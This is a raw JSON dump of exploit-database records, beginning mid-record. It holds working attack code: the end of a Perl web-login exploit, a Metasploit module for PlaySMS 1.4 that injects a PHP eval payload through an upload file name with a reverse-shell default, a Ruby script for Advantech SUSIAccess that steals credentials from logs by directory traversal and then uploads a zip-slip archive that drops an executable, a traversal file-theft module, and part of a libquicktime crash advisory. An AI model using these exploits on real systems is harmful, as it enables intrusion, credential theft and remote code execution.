=~ /<td><b>Your Name:<\\/td><td><input type=text name=myusername/ || $data !~ /Set-Cookie: /)\r\n\t{\r\n\t\tprint \"[-] failed to login\\n\";\r\n\t\texit;\r\n\t}\r\n\t\r\n\tmy $cookies = \"\";\t# chocolate cookies\r\n\tmy $index1 = index($data, \"\\r\\n\\r\\n\");\r\n\tif($index1 >= 0)\r\n\t{\r\n\t\tmy $index2 = index($data, \"Set-Cookie: \") + 12;\r\n\t\tmy $index3 = index($data, \"\\r\\n\", $index2);\r\n\t\t$cookies = \"Cookie: \".substr($data, $index2, $index3-$index2+2);\r\n\t}\r\n\t\r\n\tprint \"[+] logged in as '$username'\\n\";\r\n\treturn $cookies;\r\n}\r\n\r\nsub register(\\$, \\$, \\$, \\$, \\$, \\$, \\$) {\r\n\tmy $server = shift;\r\n\tmy $path = shift;\r\n\tmy $name = shift;\r\n\tmy $user = shift;\r\n\tmy $password = shift;\r\n\tmy $email = shift;\r\n\r\n\tmy $d = \"action=register&emailadd=\".$email.\"&newname=\".$name.\"&newusername=\".$user.\"&newpassword=\".$password;\r\n\tmy $query = \"POST \".$path.\"lostsheep.php HTTP/1.1\\r\\n\";\r\n\t$query .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= \"Content-Length: \".length($d).\"\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\t$query .= $d;\r\n\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data =~ /<li>Sorry the username you entered <b><\\/b> is already taken.. try again/)\r\n\t{\r\n\t\tprint \"[-] failed: username taken\\n\";\r\n\t\texit;\r\n\t}\r\n\tif($data =~ /you did not enter in a/)\r\n\t{\r\n\t\tprint \"[-] failed\\n\";\r\n\t\texit;\r\n\t}\r\n\tprint \"[+] user '$user' with password '$password' registered\\n\";\r\n}\r\n\r\nsub sendpacket(\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $request = shift;\r\n\r\n\tmy $sock = IO::Socket::INET->new(Proto => \"tcp\", PeerAddr => $server, PeerPort => $port) or die \"[-] Could not connect to $server:$port $!\\n\";\r\n\tprint $sock \"$request\";\r\n\r\n\t\r\n\tmy $data = \"\";\r\n\tmy $answer;\r\n\twhile($answer = <$sock>)\r\n\t{\r\n\t\t$data .= $answer;\r\n\t}\r\n\t\r\n\tclose($sock);\r\n\treturn $data;\r\n}\r\n\r\nsub randstring(\\$,\\$) {\r\n\tmy $min = shift;\r\n\tmy $max = shift;\r\n\r\n\tmy $length = int( (rand(65535)%($max-$min+1))+$min);\r\n\tmy $ret = \"\";\r\n\tfor(my $i = 0; $i < $length; $i++)\r\n\t{\r\n\t\tmy $w = int(rand(3));\r\n\t\tif($w == 0)\r\n\t\t{\r\n\t\t\t$ret .= chr(97 + int(rand(26)));\r\n\t\t}\r\n\t\telsif($w == 1)\r\n\t\t{\r\n\t\t\t$ret .= chr(65 + int(rand(26)));\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t$ret .= chr(48 + int(rand(10)));\r\n\t\t}\r\n\t}\r\n\r\n\treturn $ret;\r\n}\r\n\r\n\r\nsub usage() {\r\n\tprintf \"usage: %s <website> <port> [user(optional)] [password(optional)] [shell path without trailing / (optional)]\\n\", $0;\r\n\tprintf \"exemple: %s www.site.com/csig/ 80\\n\", $0;\r\n\texit;\r\n}\r\n\r\n\r\nsub urlEncode {\r\n my ($string) = @_;\r\n $string =~ s/(\\W)/\"%\" . unpack(\"H2\", $1)/ge;\r\n return $string;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-04-01] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "c383b542fc41363ebe4830c60634dafc", "key": "href"}, {"hash": "4fdc3fdec6d9aa927d99ca165e56d195", "key": "modified"}, {"hash": "4fdc3fdec6d9aa927d99ca165e56d195", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1676b5b518b556bc81ba80597c9985f6", "key": "reporter"}, {"hash": "a1f50e4a0b32108acdecbcc9fc6777f5", "key": "sourceData"}, {"hash": "414de6845457ff7ababca9fef94eecb9", "key": "sourceHref"}, {"hash": "c909683139456c976936f60c867f1059", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"result": {"zdt": [{"lastseen": "2018-05-09T15:39:06", "references": [], "description": "This Metasploit module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS version 1.4. This issue is caused by improper file name handling in sendfromfile.php file. Authenticated Users can upload a file and rename the file with a malicious payload. This Metasploit module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.", "edition": 1, "reporter": "metasploit", "published": "2018-05-09T00:00:00", "title": "PlaySMS 1.4 - sendfromfile.php?Filename Authenticated Code Execution Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-05-09T15:39:06", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9080"], "modified": "2018-05-09T00:00:00", "id": "1337DAY-ID-30324", "href": "https://0day.today/exploit/description/30324", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'PlaySMS sendfromfile.php Authenticated \"Filename\" Field Code Execution',\r\n 'Description' => %q{\r\n This module exploits a code injection vulnerability within an authenticated file\r\n upload feature in PlaySMS v1.4. This issue is caused by improper file name handling\r\n in sendfromfile.php file.\r\n Authenticated Users can upload a file and rename the file with a malicious payload.\r\n This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.\r\n },\r\n 'Author' =>\r\n [\r\n 'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Discoverys and Metasploit Module\r\n 'DarkS3curity' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['EDB','42003'],\r\n ['CVE','2017-9080'],\r\n ['URL','https://www.youtube.com/watch?v=MuYoImvfpew'],\r\n ['URL','http://touhidshaikh.com/blog/?p=336']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => false,\r\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\r\n 'ENCODER' => 'php/base64',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [ 'PlaySMS 1.4', { } ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'May 21 2017'))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"Base playsms directory path\", '/']),\r\n OptString.new('USERNAME', [ true, \"Username to authenticate with\", 'admin']),\r\n OptString.new('PASSWORD', [ true, \"Password to authenticate with\", 'admin'])\r\n ])\r\n end\r\n\r\n def uri\r\n return target_uri.path\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(uri, 'index.php')\r\n })\r\n rescue\r\n vprint_error('Unable to access the index.php file')\r\n return CheckCode::Unknown\r\n end\r\n\r\n if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def login\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'method' => 'GET',\r\n 'vars_get' => {\r\n 'app' => 'main',\r\n 'inc' => 'core_auth',\r\n 'route' => 'login',\r\n }\r\n })\r\n\r\n # Grabbing CSRF token from body\r\n /name=\"X-CSRF-Token\" value=\"(?<csrf>[a-z0-9\"]+)\">/ =~ res.body\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not determine CSRF token\") if csrf.nil?\r\n vprint_good(\"X-CSRF-Token for login : #{csrf}\")\r\n\r\n cookies = res.get_cookies\r\n vprint_status('Trying to Login ......')\r\n # Send Creds with cookies.\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'cookie' => cookies,\r\n 'vars_get' => Hash[{\r\n 'app' => 'main',\r\n 'inc' => 'core_auth',\r\n 'route' => 'login',\r\n 'op' => 'login',\r\n }.to_a.shuffle],\r\n 'vars_post' => Hash[{\r\n 'X-CSRF-Token' => csrf,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n }.to_a.shuffle],\r\n })\r\n\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Did not respond to Login request\") if res.nil?\r\n\r\n # Try to access index page with authenticated cookie.\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'cookie' => cookies,\r\n })\r\n\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Did not respond to Login request\") if res.nil?\r\n\r\n # if we redirect to core_welcome dan we assume we have authenticated cookie.\r\n if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome')\r\n print_good(\"Authentication successful : [ #{datastore['USERNAME']} : #{datastore['PASSWORD']} ]\")\r\n store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])\r\n return cookies\r\n else\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]\")\r\n end\r\n end\r\n\r\n def exploit\r\n cookies = login\r\n\r\n # Agian CSRF token.\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'method' => 'GET',\r\n 'cookie' => cookies,\r\n 'vars_get' => Hash[{\r\n 'app' => 'main',\r\n 'inc' => 'feature_sendfromfile',\r\n 'op' => 'list',\r\n }.to_a.shuffle]\r\n })\r\n\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Did not respond to Login request\") if res.nil?\r\n\r\n # Grabbing CSRF token from body.\r\n /name=\"X-CSRF-Token\" value=\"(?<csrf>[a-z0-9\"]+)\">/ =~ res.body\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not determine CSRF token\") if csrf.nil?\r\n vprint_good(\"X-CSRF-Token for upload : #{csrf}\")\r\n\r\n # Payload.\r\n evilname = \"<?php $t=$_SERVER['HTTP_USER_AGENT']; eval($t); ?>\"\r\n\r\n # setup POST request.\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name=\"X-CSRF-Token\"') # CSRF token\r\n post_data.add_part(\"#{rand_text_alpha(8 + rand(5))}\", content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = \"form-data; name=\\\"fncsv\\\"; filename=\\\"#{evilname}\\\"\") # payload\r\n post_data.add_part(\"1\", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name=\"fncsv_dup\"') # extra\r\n data = post_data.to_s\r\n\r\n vprint_status('Trying to upload file with malicious Filename Field....')\r\n # Lets Send Upload request.\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'method' => 'POST',\r\n 'agent' => payload.encode,\r\n 'cookie' => cookies,\r\n 'vars_get' => Hash[{\r\n 'app' => 'main',\r\n 'inc' => 'feature_sendfromfile',\r\n 'op' => 'upload_confirm',\r\n }.to_a.shuffle],\r\n 'headers' => {\r\n 'Upgrade-Insecure-Requests' => '1',\r\n },\r\n 'Connection' => 'close',\r\n 'data' => data,\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n })\r\n end\r\nend\n\n# 0day.today [2018-05-09] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/30324"}, {"lastseen": "2018-02-19T15:24:57", "references": [], "description": "Exploit for jsp platform in category web applications", "edition": 1, "reporter": "James Fitts", "published": "2017-08-01T00:00:00", "type": "zdt", "title": "Advantech SUSIAccess <= 3.0 - RecoveryMgmt File Upload Exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9351", "CVE-2016-9349"], "modified": "2017-08-01T00:00:00", "href": "https://0day.today/exploit/description/28227", "id": "1337DAY-ID-28227", "sourceData": "#! /usr/bin/env ruby\r\n \r\n=begin\r\nExploit Title: Advantech SUSIAccess RecoveryMgmt File Upload\r\nDate: 07/31/17\r\nExploit Author: james fitts \r\nVendor Homepage: http://www.advantech.com/\r\nVersion: Advantech SUSIAccess <= 3.0\r\nTested on: Windows 7 SP1\r\nRelavant Advisories:\r\n ZDI-16-630\r\n ZDI-16-628\r\n CVE-2016-9349\r\n CVE-2016-9351\r\n BID-94629\r\n ICSA-16-336-04\r\n \r\nNotes:\r\n This PoC will upload AcronisInstaller.exe to the root of C:\\\r\n You can modify this to drop files where ever you want on the\r\n filesystem.\r\n \r\n By default the script will use the directory traversal vuln\r\n to pull down the log files and parse for the base64 encoded\r\n credentials. Once it has that, it will use them to log into\r\n the application and upload the malicious zip file.\r\n=end\r\n \r\nrequire 'mime/types'\r\nrequire 'fileutils'\r\nrequire 'net/http'\r\nrequire 'nokogiri'\r\nrequire 'base64'\r\nrequire 'digest'\r\nrequire 'date'\r\nrequire 'uri'\r\nrequire 'zip'\r\n \r\ndef uploadZip(target, creds, cookies)\r\n uri = URI(\"http://#{target}:8080/webresources/RecoveryMgmt/upload\")\r\n bound = \"AaBbCcDdEe\"\r\n \r\n path = Dir.pwd\r\n zipfile = \"#{path}/update.zip\"\r\n \r\n post_data = []\r\n post_data << \"--#{bound}\\r\\n\"\r\n post_data << \"Content-Disposition: form-data; name=\\\"frmUpdateSetting_Acronis_LastUpdateName\\\"\"\r\n post_data << \"\\r\\n\\r\\n\\r\\n\"\r\n post_data << \"--#{bound}\\r\\n\"\r\n post_data << \"Content-Disposition: form-data; name=\\\"frmUpdateSetting_Acronis_UploadFileFullName\\\"\"\r\n post_data << \"\\r\\n\\r\\nupdate.zip\\r\\n\"\r\n post_data << \"--#{bound}\\r\\n\"\r\n post_data << \"Content-Disposition: form-data; name=\\\"frmUpdateSetting_Acronis_Content\\\"\"\r\n post_data << \"\\r\\n\\r\\n\"\r\n post_data << \"<request Authorization=\\\"#{creds[0].to_s}\\\"/>\\r\\n\"\r\n post_data << \"--#{bound}\\r\\n\"\r\n post_data << \"Content-Disposition: form-data; name=\\\"frmUpdateSetting_Acronis_FileInput\\\"; filename=\\\"update.zip\\\"\"\r\n post_data << \"\\r\\nContent-Type: application/zip\"\r\n post_data << \"\\r\\n\\r\\n\"\r\n post_data << File.read(zipfile)\r\n post_data << \"\\r\\n\\r\\n--#{bound}--\\r\\n\"\r\n \r\n req = Net::HTTP::Post.new(uri, initheader = {\r\n 'Cookie' => cookies,\r\n 'Authorization' => \"Basic #{creds[0].to_s}\",\r\n 'X-Requested-With' => \"XMLHttpRequest\",\r\n 'Content-Type' => \"multipart/form-data; boundary=#{bound}\",\r\n 'User-Agent' => \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\",\r\n 'Accept-Language' => \"en-US,en;q=0.5\",\r\n 'Accept' => \"text/plain, */*; q=0.01\",\r\n 'Connection' => \"close\"\r\n })\r\n \r\n req.body = post_data.join\r\n \r\n http = Net::HTTP.new(\"#{target}\", 8080)\r\n res = http.start {|http| http.request(req)}\r\n \r\n if res.code =~ /200/\r\n puts \"[+] Upload successful!\"\r\n end\r\nend\r\n \r\ndef craftZip(target, payload)\r\n path = \"../../../../../../../../../../Program%20Files\\\\Advantech\\\\SUSIAccess%203.0%20Server\\\\Setting.xml\"\r\n \r\n uri = URI(\"http://#{target}:8080/downloadCSV.jsp?file=#{path}\")\r\n res = Net::HTTP.get_response(uri)\r\n xml = Nokogiri::XML(res.body)\r\n ver = xml.xpath('//setting/Configuration/ThridParty/Acronis/version').to_s.split(\"=\")[1].split(\"\\\"\")[1]\r\n kern_ver = xml.xpath('//setting/Configuration/ThridParty/Acronis/kernal_version').to_s.split(\"=\")[1].split(\"\\\"\")[1]\r\n \r\n # version information doesn't matter\r\n # the application will still extract the zip\r\n # file regardless of whether or not its\r\n # a greater version or lesser\r\n f = File.open(\"LatestVersion.txt\", 'w')\r\n f.puts(\"Installer Version: #{ver}\\r\\nApplication Version: #{kern_ver}\")\r\n f.close\r\n \r\n f = File.open(\"md5.txt\", 'w')\r\n md5 = Digest::MD5.hexdigest(File.read(\"AcronisInstaller.exe\"))\r\n f.puts md5\r\n f.close\r\n \r\n path = Dir.pwd\r\n zipfile = \"#{path}/update.zip\"\r\n \r\n if File.exist?(zipfile)\r\n FileUtils.rm(zipfile)\r\n end\r\n \r\n files = [\"AcronisInstaller.exe\", \"LatestVersion.txt\", \"md5.txt\"]\r\n \r\n levels = \"../\" * 10\r\n Zip::File.open(zipfile, Zip::File::CREATE) do |zip|\r\n files.each do |fname|\r\n if fname == \"AcronisInstaller.exe\"\r\n zip.add(\"#{levels}#{fname}\", fname)\r\n end\r\n zip.add(fname, fname)\r\n end\r\n end\r\n \r\n if File.exist?(zipfile)\r\n puts \"[!] Malicious zip created successfully\"\r\n end\r\nend\r\n \r\ndef doLogin(target, creds)\r\n formattedDate = DateTime.now.strftime(\"%a %b %d %Y %H:%M:%S GMT-0400 (EDT)\")\r\n formattedDate = URI::encode(formattedDate)\r\n \r\n uri = URI(\"http://#{target}:8080/frmServer.jsp?d=#{formattedDate}\")\r\n \r\n res = Net::HTTP.get_response(uri)\r\n jsessid = res.header['Set-Cookie'].split(';')[0]\r\n cookies = \"deviceType=pc; log4jq=OFF; selectedLang=en_US; #{jsessid}\"\r\n \r\n uname = Base64.decode64(creds[0].to_s).split(\":\")[0]\r\n pass = Base64.decode64(creds[0].to_s).split(\":\")[1]\r\n \r\n data = \"<request Authorization=\\\"#{creds[0].to_s}\\\">\"\r\n data << \"<item name=\\\"username\\\" value=\\\"#{uname}\\\"/>\"\r\n data << \"<item name=\\\"password\\\" value=\\\"#{pass}\\\"/>\"\r\n data << \"</request>\"\r\n \r\n puts \"[+] Attempting login with pilfered credentials now\"\r\n uri = URI(\"http://#{target}:8080/webresources/AccountMgmt/Login\")\r\n \r\n req = Net::HTTP::Post.new(uri, initheader = {\r\n 'Content-Type' => \"application/xml\",\r\n 'Cookies' => cookies,\r\n 'Authorization' => \"Basic #{creds[0].to_s}\",\r\n 'X-Requested-With' => 'XMLHttpRequest'\r\n })\r\n \r\n req.body = data\r\n \r\n http = Net::HTTP.new(\"#{target}\", 8080)\r\n res = http.start {|http| http.request(req)}\r\n \r\n if res.body =~ /<result><role name/\r\n puts \"[+] Login successful!\"\r\n return cookies\r\n else\r\n puts \"[-] Something went wrong...\"\r\n end\r\n \r\nend\r\n \r\ndef getCreds(target)\r\n cnt = 1\r\n d = Date.today\r\n d.strftime(\"%y-%m-%d\")\r\n creds = []\r\n \r\n while cnt < 31\r\n fdate = d - cnt\r\n cnt += 1\r\n \r\n path = \"../../../../../../../../../../Program Files\\\\Apache Software Foundation\\\\logs\\\\\"\r\n file = \"localhost_access_log.#{fdate}.txt\"\r\n full_path = path + file\r\n \r\n uri = URI(\"http://#{target}:8080/downloadCSV.jsp?file=#{full_path}\")\r\n \r\n res = Net::HTTP.get_response(uri)\r\n \r\n if res.code =~ /200/\r\n creds << res.body.scan(/(?<=Authorization=%22)[A-Za-z0-9=]+/)\r\n end\r\n end\r\n return creds.flatten.uniq\r\nend\r\n \r\n##\r\n# Main\r\n##\r\nif ARGV.length != 1\r\n puts \"Usage:\\r\\n\\truby #{$0} [TARGET IP]\"\r\nelse\r\n target = ARGV[0]\r\n payload = \"AcronisInstaller.exe\"\r\n \r\n puts \"[+] Extracting credentials now...\"\r\n credentials = getCreds(target)\r\n if credentials.length > 0\r\n puts \"[!] Credentials found!\"\r\n cookies = doLogin(target, credentials)\r\n puts \"[+] Crafting malicious zip now...\"\r\n craftZip(target, payload)\r\n uploadZip(target, credentials, cookies)\r\n else\r\n puts \"[-] Credentials not found.. Try searching for more log files..\"\r\n exit\r\n end\r\nend\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/28227", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-05T13:06:29", "references": [], "description": "Exploit for jsp platform in category web applications", "edition": 1, "reporter": "James Fitts", "published": "2017-08-01T00:00:00", "type": "zdt", "title": "Advantech SUSIAccess <= 3.0 - Directory Traversal / Information Disclosure Exploit", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9349"], "modified": "2017-08-01T00:00:00", "href": "https://0day.today/exploit/description/28228", "id": "1337DAY-ID-28228", "sourceData": "require 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Auxiliary\r\n Rank = GreatRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Advantech SUSIAccess Server Directory Traversal Information Disclosure',\r\n 'Description' => %q{\r\n This module exploits an information disclosure vulnerability found in\r\n Advantech SUSIAccess <= version 3.0. The vulnerability is triggered when\r\n sending a GET request to the server with a series of dot dot slashes (../)\r\n in the file parameter. \r\n },\r\n 'Author' => [ 'james fitts' ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-9349' ],\r\n [ 'ZDI', '16-628' ],\r\n [ 'BID', '94629' ],\r\n [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-336-04' ]\r\n ],\r\n 'DisclosureDate' => 'Dec 13 2016'))\r\n \r\n register_options(\r\n [\r\n OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),\r\n OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),\r\n Opt::RPORT(8080)\r\n ], self.class )\r\n end\r\n \r\n def run\r\n \r\n depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']\r\n levels = \"/\" + (\"../\" * depth)\r\n \r\n file = \"#{levels}#{datastore['FILE']}\"\r\n file = file.gsub(/ /, \"%20\")\r\n \r\n res = send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => \"/downloadCSV.jsp?file=#{file}\",\r\n })\r\n \r\n if res and res.code == 200\r\n loot = res.body\r\n if not loot or loot.empty?\r\n print_status(\"File from #{rhost}:#{rport} is empty...\")\r\n return\r\n end\r\n file = ::File.basename(datastore['FILE'])\r\n path = store_loot('advantech_susiaccess.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])\r\n print_status(\"Stored #{datastore['FILE']} to #{path}\")\r\n return\r\n else\r\n print_error(\"Something went wrong... Application returned a #{res.code}\")\r\n end\r\n \r\n end\r\nend\r\n__END__\r\n<%@ page import=\"java.util.*,java.io.*\" %> \r\n<%\r\n File f = new File (getServletContext().getRealPath(\"/\") + request.getParameter(\"file\") );\r\n //set the content type(can be excel/word/powerpoint etc..)\r\n response.setContentType (\"application/csv\");\r\n //set the header and also the Name by which user will be prompted to save\r\n response.setHeader (\"Content-Disposition\", \"attachment; filename=\\\"\"+request.getParameter(\"file\").split(\"/\")[2] +\"\\\"\");\r\n \r\n //get the file name\r\n String name = f.getName().substring(f.getName().lastIndexOf(\"/\") + 1,f.getName().length());\r\n //OPen an input stream to the file and post the file contents thru the \r\n //servlet output stream to the client m/c\r\n \r\n InputStream in = new FileInputStream(f);\r\n ServletOutputStream outs = response.getOutputStream();\r\n \r\n \r\n int bit = 256;\r\n int i = 0;\r\n try {\r\n while ((bit) >= 0) {\r\n bit = in.read();\r\n outs.write(bit);\r\n }\r\n //System.out.println(\"\" +bit);\r\n } catch (IOException ioe) {\r\n ioe.printStackTrace(System.out);\r\n }\r\n// System.out.println( \"n\" + i + \" bytes sent.\");\r\n// System.out.println( \"n\" + f.length() + \" bytes sent.\");\r\n outs.flush();\r\n outs.close();\r\n in.close(); \r\n \r\n%>\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/28228", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-02-28T01:37:24", "references": [], "description": "Exploit for linux platform in category dos / poc", "edition": 1, "reporter": "qflb.wu", "published": "2017-06-10T00:00:00", "title": "libquicktime 1.2.4 - Denial of Service Vulnerability", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9124", "CVE-2017-9125", "CVE-2017-9126", "CVE-2017-9128", "CVE-2017-9123", "CVE-2017-9127", "CVE-2017-9122"], "modified": "2017-06-10T00:00:00", "href": "https://0day.today/exploit/description/27921", "id": "1337DAY-ID-27921", "sourceData": "libquicktime multiple vulnerabilities\r\n \r\n \r\n================\r\nAuthor : qflb.wu\r\n===============\r\n \r\n \r\nIntroduction:\r\n=============\r\nThe libquicktime package contains the libquicktime library, various plugins and codecs, along with graphical and command line utilities used for encoding and decoding QuickTime files. This is useful for reading and writing files in the QuickTime format. The goal of the project is to enhance, while providing compatibility with the Quicktime 4 Linux library.\r\n \r\n \r\nAffected version:\r\n=====\r\n1.2.4\r\n \r\n \r\nVulnerability Description:\r\n==========================\r\n##################################\r\n1.\r\nthe quicktime_read_moov function in moov.c in libquicktime 1.2.4 can cause a denial of service(infinite loop and CPU consumption) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4\r\nCVE:\r\nCVE-2017-9122\r\n \r\n \r\n###################################\r\n2.\r\nthe lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(invalid memory read and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4\r\n \r\n \r\nASAN:SIGSEGV\r\n=================================================================\r\n==14254==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f31e6ae7185 sp 0x7ffed033a270 bp 0x0000006bdb50 T0)\r\n==14254==WARNING: Trying to symbolize code, but external symbolizer is not initialized!\r\n #0 0x7f31e6ae7184 (/usr/local/lib/libquicktime.so.0+0x6c184)\r\n #1 0x49b1c6 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x49b1c6)\r\n #2 0x47fbaa (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fbaa)\r\n #3 0x7f31e43b2ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #4 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV ??:0 ??\r\n==14254==ABORTING\r\n \r\n \r\ndebug info:\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n...\r\nStopped reason: SIGSEGV\r\n0x00007ffff7829185 in lqt_frame_duration (file=<optimized out>, track=<optimized out>, \r\n constant=<optimized out>) at lqt_quicktime.c:1242\r\n1242 return\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4\r\nCVE:\r\nCVE-2017-9123\r\n \r\n \r\n###################################\r\n3.\r\nthe quicktime_match_32 in util.c in libquicktime 1.2.4 can cause a denial of service(NULL pointer dereference and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4\r\n \r\n \r\nASAN:SIGSEGV\r\n=================================================================\r\n==14359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe8af6b85d8 sp 0x7fff490cd4e0 bp 0x7fff490cd5b0 T0)\r\n==14359==WARNING: Trying to symbolize code, but external symbolizer is not initialized!\r\n #0 0x7fe8af6b85d7 (/usr/local/lib/libquicktime.so.0+0x3605d7)\r\n #1 0x7fe8af68b566 (/usr/local/lib/libquicktime.so.0+0x333566)\r\n #2 0x7fe8af63c71a (/usr/local/lib/libquicktime.so.0+0x2e471a)\r\n #3 0x7fe8af3d1658 (/usr/local/lib/libquicktime.so.0+0x79658)\r\n #4 0x7fe8af3d84a8 (/usr/local/lib/libquicktime.so.0+0x804a8)\r\n #5 0x7fe8af3a95da (/usr/local/lib/libquicktime.so.0+0x515da)\r\n #6 0x47fad2 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fad2)\r\n #7 0x7fe8acc8fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #8 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\nAddressSanitizer can not provide additional 